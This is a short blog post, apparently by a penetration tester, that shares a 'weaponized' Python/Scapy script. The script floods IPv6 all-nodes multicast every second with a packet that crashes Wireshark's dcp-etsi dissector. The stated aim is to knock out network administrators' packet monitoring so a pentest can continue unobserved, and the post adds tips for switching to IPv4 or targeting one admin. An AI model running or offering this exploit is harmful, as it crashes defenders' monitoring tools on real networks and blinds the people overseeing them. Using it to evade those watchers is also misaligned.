First let me start by saying I did not find this, nor did I do any of the heavy lifting in making this. All of that was the guys at NYU Poly ISIS Lab (http://isisblogs.poly.edu/2012/08/03/tracing-bugs-in-wireshark/).

That being I always get a little excited I get whenever a new wireshark exploit comes out. Sometimes when I am conducting an internal pentest I get a network admin with the mentality of a Stasi. They sit there with wireshark running monitoring my port looking for any hint of malicious traffic. As soon as they see something the flag us as “caught” and put a stop to the pentest. So having a collection of wireshark exploits is helpful in stopping the network admins and allowing me to continue my work unimpeded. As such I “weaponized” the code the NYU Poly ISIS lab blog post to make my life easier. The only real changes are making the packet get sent every second, I hard coded in the IPv6 link-local all nodes multicast group at FF02::1, and I took out the writing of the pcap file. It should also be noted that if for some reason you need to run this over IPv4 you can change “packet=IPv6(” to “packet=IP(” and change the dst=“FF02::1” to your local broadcast and it will still work. Although, as long as your machine can write an IPv6 packet and the wireshark machine can read it, it doesn’t matter if they are running IPv6 on the network.

#!/usr/bin/python 
#divide by zero in dcp-etsi.c wireshark dissector 

from scapy.all import * 
from sys import * 

crashdata='504623c4000000008854aa3d5a474547'.decode('hex') 
packet=IPv6(dst="FF02::1")/UDP(dport=55935,sport=42404)/crashdata 
send(packet,inter=1,loop=1)

If you know the admins IPv6 Address you can change the FF02::1 address to it so you are only targeting him Other wise just leave it as is and it will get sent to everyone local who is talking IPv6.

Either way just run it and wireshark should crash leaving you free to finish your pentest.